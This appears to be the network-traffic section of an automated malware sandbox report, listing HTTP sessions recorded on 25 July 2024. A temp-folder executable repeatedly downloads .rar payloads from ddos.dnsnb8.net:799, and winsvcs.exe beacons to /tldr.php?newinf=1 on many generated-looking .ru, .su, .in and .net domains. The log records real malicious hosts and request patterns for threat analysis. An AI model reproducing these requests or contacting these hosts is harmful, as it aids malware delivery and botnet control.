                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        0192.168.2.64972244.221.84.1057996516C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.618397951 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                        Host: ddos.dnsnb8.net:799
                                                                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        1192.168.2.64972444.221.84.1057996516C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:13:24.452306986 CEST288OUTGET /cj//k2.rar HTTP/1.1
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                        Host: ddos.dnsnb8.net:799
                                                                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        2192.168.2.64973144.221.84.1057996256C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:13:40.221301079 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                        Host: ddos.dnsnb8.net:799
                                                                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        3192.168.2.649733170.39.226.155802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.579219103 CEST158OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: ssofhoseuegsgrfnu.ru
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.539278984 CEST244INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Location: http://ww88.ssofhoseuegsgrfnu.ru/
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:13:42 GMT
                                                                                                                                                                                                                        Content-Length: 68
                                                                                                                                                                                                                        Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 38 38 2e 73 73 6f 66 68 6f 73 65 75 65 67 73 67 72 66 6e 75 2e 72 75 2f 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                        Data Ascii: <a href="http://ww88.ssofhoseuegsgrfnu.ru/">Moved Permanently</a>.


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        4192.168.2.649734199.59.243.226802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.762067080 CEST170OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: ww88.ssofhoseuegsgrfnu.ru
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Jul 25, 2024 15:13:43.265232086 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                        date: Thu, 25 Jul 2024 13:13:43 GMT
                                                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                                                        content-length: 1070
                                                                                                                                                                                                                        x-request-id: 6e7dcc87-362b-4671-a36b-ec33e96e52ae
                                                                                                                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vR4VHrKotkztFI7kbVNMUmzEZ2KTEx3rRXOBVz/AVccxU1b1dFkNd1H1Tfer0tWGIqfXkFdhyE8WcGdHRHA0pQ==
                                                                                                                                                                                                                        set-cookie: parking_session=6e7dcc87-362b-4671-a36b-ec33e96e52ae; expires=Thu, 25 Jul 2024 13:28:43 GMT; path=/
                                                                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 52 34 56 48 72 4b 6f 74 6b 7a 74 46 49 37 6b 62 56 4e 4d 55 6d 7a 45 5a 32 4b 54 45 78 33 72 52 58 4f 42 56 7a 2f 41 56 63 63 78 55 31 62 31 64 46 6b 4e 64 31 48 31 54 66 65 72 30 74 57 47 49 71 66 58 6b 46 64 68 79 45 38 57 63 47 64 48 52 48 41 30 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vR4VHrKotkztFI7kbVNMUmzEZ2KTEx3rRXOBVz/AVccxU1b1dFkNd1H1Tfer0tWGIqfXkFdhyE8WcGdHRHA0pQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                        Jul 25, 2024 15:13:43.265372038 CEST504INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                        Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmU3ZGNjODctMzYyYi00NjcxLWEzNmItZWMzM2U5NmU1MmFlIiwicGFnZV90aW1lIjoxNzIxOTEzMjIzLCJwYWdlX3VybCI6I


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        5192.168.2.64973544.221.84.1057996256C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.022974968 CEST288OUTGET /cj//k2.rar HTTP/1.1
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                        Host: ddos.dnsnb8.net:799
                                                                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        6192.168.2.64973692.63.197.48802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.442042112 CEST150OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: 92.63.197.48


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        7192.168.2.64973744.221.84.1057996256C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:13:46.669744015 CEST288OUTGET /cj//k3.rar HTTP/1.1
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                        Host: ddos.dnsnb8.net:799
                                                                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        8192.168.2.64973844.221.84.1057996256C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:13:50.951833010 CEST288OUTGET /cj//k4.rar HTTP/1.1
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                        Host: ddos.dnsnb8.net:799
                                                                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        9192.168.2.64973944.221.84.1057996256C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:13:53.598258972 CEST288OUTGET /cj//k5.rar HTTP/1.1
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                        Host: ddos.dnsnb8.net:799
                                                                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        10192.168.2.64974292.246.89.93802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:14:07.012612104 CEST158OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: slpsrgpsrhojifdij.ru


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        11192.168.2.64974792.246.89.93802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:14:30.015019894 CEST158OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: aiiaiafrzrueuedur.ru


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        12192.168.2.64974944.221.84.105802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:14:48.618901968 CEST158OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: fiiauediehduefuge.ru
                                                                                                                                                                                                                        Jul 25, 2024 15:14:49.123444080 CEST418INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:14:49 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=5d394de2fa783cfce7dc55d49785cf26|8.46.123.33|1721913289|1721913289|0|1|0; path=/; domain=.fiiauediehduefuge.ru; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        13192.168.2.64975192.246.89.93802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:14:55.240864038 CEST158OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: ssofhoseuegsgrfnj.su


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        14192.168.2.64975392.246.89.93802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:15:09.417257071 CEST158OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: afeifieuuufufufuf.su


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        15192.168.2.649754208.100.26.245802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:15:22.135179043 CEST158OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: ssofhoseuegsgrfnj.in
                                                                                                                                                                                                                        Jul 25, 2024 15:15:22.630103111 CEST342INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:15:22 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 178
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        16192.168.2.64975544.213.104.86802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:15:27.873435020 CEST158OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: eiifngjfksisiufjf.in
                                                                                                                                                                                                                        Jul 25, 2024 15:15:28.415024996 CEST418INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:15:28 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=32e0f397b678c58e90a7b788e7de14f9|8.46.123.33|1721913328|1721913328|0|1|0; path=/; domain=.eiifngjfksisiufjf.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        17192.168.2.64975644.221.84.105802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.783184052 CEST158OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: iuirshriuisruruuf.in
                                                                                                                                                                                                                        Jul 25, 2024 15:15:33.325500965 CEST418INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:15:33 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=c886a0d97b9ab40dcb316a6dc68c9601|8.46.123.33|1721913333|1721913333|0|1|0; path=/; domain=.iuirshriuisruruuf.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        18192.168.2.64975913.251.16.150802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:15:43.979273081 CEST159OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: slpsrgpsrhojifdij.net
                                                                                                                                                                                                                        Jul 25, 2024 15:15:45.377959013 CEST419INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:15:45 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=65a065b29d2273d590d44b5242b07716|8.46.123.33|1721913345|1721913345|0|1|0; path=/; domain=.slpsrgpsrhojifdij.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        19192.168.2.649760185.215.113.66802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:15:46.680414915 CEST159OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: aiiaiafrzrueuedur.net
                                                                                                                                                                                                                        Jul 25, 2024 15:15:47.481281042 CEST326INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:15:47 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        20192.168.2.64976118.141.10.107802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:15:58.230988979 CEST159OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: nousiieiffgogogoo.net
                                                                                                                                                                                                                        Jul 25, 2024 15:15:59.589257002 CEST419INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:15:59 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=d4292fa8923a1241bbe132bd499456c0|8.46.123.33|1721913359|1721913359|0|1|0; path=/; domain=.nousiieiffgogogoo.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        21192.168.2.64976244.213.104.86802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:16:02.079317093 CEST159OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: eofihsishihiursgu.net
                                                                                                                                                                                                                        Jul 25, 2024 15:16:02.560853004 CEST419INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:16:02 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=dbf8f86f2ed8ad8eafb21eb14f2bd49b|8.46.123.33|1721913362|1721913362|0|1|0; path=/; domain=.eofihsishihiursgu.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        22192.168.2.64976354.244.188.177802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:16:03.882386923 CEST159OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: ssofhoseuegsgrfnj.biz
                                                                                                                                                                                                                        Jul 25, 2024 15:16:04.593945980 CEST419INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:16:04 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
